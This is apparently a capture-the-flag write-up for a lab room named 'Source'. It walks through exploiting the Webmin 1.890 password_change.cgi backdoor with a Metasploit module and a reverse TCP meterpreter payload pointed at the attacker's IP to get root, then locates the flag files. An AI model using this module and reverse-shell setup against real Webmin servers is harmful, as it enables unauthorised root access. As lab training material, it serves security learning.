source is a new room at the time this write-up has done so let's get started
as we can see before we so any think there is a hint in-room description
"Exploit a recent vulnerability and hack Webmin, a web-based system configuration tool"
we can see here that services are running called Webmin and it says that Webmin is a web-based system configuration tool
let's run Nmap and see what we will get while Nmap is running let's take a look at Webmin vulnerabilities
looks like there are remote code execution in some versions so let's back to Nmap results and see what version we have
as we can see it's running on 1.890 version the good news is this version is vulnerable to Webmin password_change.cgi Backdoor
this vulnerability has an exploit in Metasploit
you need to use exploit/unix/webapp/webmin_backdoor
set payload linux/x64/meterpreter/reverse_tcp
set RHOST "machine-IP"
set LHOST "your-IP" >> you can get it by using ifconfig you will find it under tun0
set target 0
set ssl true
and now we get root access
you can simply find the flags by using this
find / -type f -name '*.txt'
this will list all files that end with .txt extension
the first result will be root flag and if you move done a little bit you ganna find user flag
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